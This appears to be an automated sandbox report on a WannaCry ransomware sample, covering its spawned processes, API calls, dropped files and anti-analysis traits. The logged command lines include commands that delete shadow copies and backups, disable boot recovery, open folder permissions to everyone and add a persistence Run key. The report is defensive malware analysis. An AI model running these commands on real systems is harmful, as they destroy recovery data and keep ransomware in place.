Source: C:\mssecsvc.exeCode function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,0_2_00407CE0
Contains functionality to modify services (start/stop/modify)
Source: C:\mssecsvc.exeCode function: 0_2_00407FA0 ChangeServiceConfig2A,0_2_00407FA0
Contains functionality to register a service control handler (likely the sample is a service DLL)
Source: C:\mssecsvc.exeCode function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,0_2_00408090
Creates files inside the program directory
Source: C:\Windows\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108
Creates files inside the user directory
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\Default\Desktop\~SD8694.tmp
Creates temporary files
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\All Users\Microsoft\RAC\Temp\~SD887B.tmp
Executes batch files
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Executes visual basic scripts
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Found command line output
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a..v..0.............................................+'...2"........v.....@..........x...............
Source: C:\Windows\System32\cmd.exeConsole Write: ........l#..........T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d...........+........v..+.B...`...........
Source: C:\Windows\System32\reg.exeConsole Write: ........a..v..0.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........#.N...p.........#.
Source: C:\Windows\System32\vssadmin.exeConsole Write: ............`.......................a..v..0.....4...@...D....W..............................................S<..........
Source: C:\Windows\System32\vssadmin.exeConsole Write: ..............H.....N.o. .i.t.e.m.s. .f.o.u.n.d. .t.h.a.t. .s.a.t.i.s.f.y. .t.h.e. .q.u.e.r.y...........P...S<..........
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N.........Bw.dBw
Source: C:\Windows\System32\bcdedit.exeConsole Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........@...N.........Bw.dBw
Source: C:\Windows\System32\wbadmin.exeConsole Write: ........PYBw..........%...%.O..............................v.....'.@p.%.........W.5u.....'.@p.%.........................
Source: C:\Windows\System32\wbadmin.exeConsole Write: ........PYBwh.......Bo&.@o&.4.......h......................v.....(.@..&.....h...W.5u.....(.@..&.t.......f...............
PE file has an executable .text section and no other executable section
Source: mssecsvc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile read: C:\Windows\win.ini
Reads software policies
Source: C:\mssecsvc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknownProcess created: C:\mssecsvc.exe 'C:\mssecsvc.exe'
Source: unknownProcess created: C:\mssecsvc.exe C:\mssecsvc.exe -m security
Source: unknownProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 'C:\ProgramData\ywepvofkuzu108\tasksche.exe'
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\tasksche.exe C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +h .
Source: unknownProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknownProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: unknownProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: unknownProcess created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: unknownProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: unknownProcess created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: C:\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\ywepvofkuzu108\tasksche.exe C:\ProgramData\ywepvofkuzu108\tasksche.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\attrib.exe attrib +h .
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 239891494608079.bat
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe co
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskdl.exe taskdl.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: C:\ProgramData\ywepvofkuzu108\taskse.exe taskse.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: unknown unknown
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess created: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess created: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation server
Source: C:\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Contains functionality to launch a process as a different user
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Creates files inside the system directory
Source: C:\mssecsvc.exeFile created: C:\WINDOWS\tasksche.exe
Creates mutexes
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeMutant created: \BaseNamedObjects\MsWinZonesCacheCounterMutexA
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeMutant created: \BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
Deletes Windows files
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus
Enables security privileges
Source: C:\Windows\System32\wbengine.exeProcess token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: String function: 00316562 appears 35 times
PE file contains executable resources (Code or Archives)
Source: mssecsvc.exeStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.3048.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Source: tasksche.exe.3216.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Reads the hosts file
Source: C:\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewship6.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewshtcpip.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamewship6.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exeBinary or memory string: OriginalFilenamelhdfrgui.exej% vs mssecsvc.exe
Uses reg.exe to modify the Windows registry
Source: unknownProcess created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
PE file contains more sections than normal
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: Number of sections : 17 > 10
Source: libeay32.dll.3408.drStatic PE information: Number of sections : 18 > 10
Source: libevent-2-0-5.dll.3408.drStatic PE information: Number of sections : 17 > 10
Potential malicious VBS script found (suspicious strings)
Source: C:\Windows\System32\cmd.exeDropped file: SET ow = WScript.CreateObject("WScript.Shell")

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10001360 time,AllocateAndInitializeSid,time,CheckTokenMembership,FreeSid,5_2_10001360

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeCode function: 19_2_001C11FD SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,19_2_001C11FD
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\mssecsvc.exeSystem information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,5_2_100011D0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\tasksche.exeCode function: 3_2_004029CC free,GetProcessHeap,HeapFree,3_2_004029CC

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_10002300
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,5_2_10004A40
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,14_2_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,14_2_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,14_2_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,18_1_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,swprintf,#825,#825,18_1_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,18_1_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 23_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,23_1_00401080
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: taskhsvc.exeBinary or memory string: 9bdnPNObPosMJgjNTFNQ7GrneqcJovXdxnKaDfQMDU2QMnaVIpZWJmCVmciOUzku
Source: taskhsvc.exeBinary or memory string: ntor-onion-key 98xF42/leL0gt7INkbMlQemUc3uYYiQzK1dmPR0afWA=
Source: taskhsvc.exeBinary or memory string: r385m+l2iI6U+RBB9ZGf2qEmUhX1m22Ub04mANu8v5MhjaK9Cr/9AgMBAAE=
Source: taskhsvc.exeBinary or memory string: id ed25519 vA9zbcE+2YhiQRkUAt5LvMCijbpUW4Op15qrMlKqy+s
Source: taskhsvc.exeBinary or memory string: ntor-onion-key cs1j8xs837ZvQVZiX90H7gHk20kQeMUz/RYOKuTJRHs=
Queries a list of all running processes
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeProcess information queried: ProcessInformation
Checks the free space of harddrives
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeThread delayed: delay time: -1000
Enumerates the file system
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\~SD874C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\~SD874B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\~SD8739.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD874E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\~SD874D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\~SD874A.tmp
Found dropped PE file which has not been started or loaded
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeDropped PE file which has not been started: C:\Users\Default\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeDropped PE file which has not been started: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_core-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeDropped PE file which has not been started: C:\Users\Public\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeDropped PE file which has not been started: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_extra-2-0-5.dll
Found large amount of non-executed APIs
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeAPI coverage: 7.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\mssecsvc.exe TID: 3092Thread sleep time: -60000s >= -60s
Source: C:\mssecsvc.exe TID: 3200Thread sleep time: -60000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep time: -500s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3300Thread sleep count: 158 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3300Thread sleep time: -158000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312Thread sleep count: 31 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312Thread sleep time: -93000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3304Thread sleep time: -95000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep count: 77 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep time: -770s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3328Thread sleep time: -180000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312Thread sleep time: -3000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3304Thread sleep time: -5000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3328Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3316Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe TID: 3460Thread sleep time: -10000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe TID: 3520Thread sleep time: -200s >= -60s
Source: C:\Windows\System32\vssadmin.exe TID: 3684Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbem\WMIC.exe TID: 3796Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbadmin.exe TID: 3868Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbengine.exe TID: 3916Thread sleep time: -60000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe TID: 3912Thread sleep time: -200s >= -60s
Source: C:\Windows\System32\vdsldr.exe TID: 3932Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\vdsldr.exe TID: 3968Thread sleep time: -60000s >= -60s
Found evasive API chain (may stop execution after checking mutex)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_5-1483

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\mssecsvc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
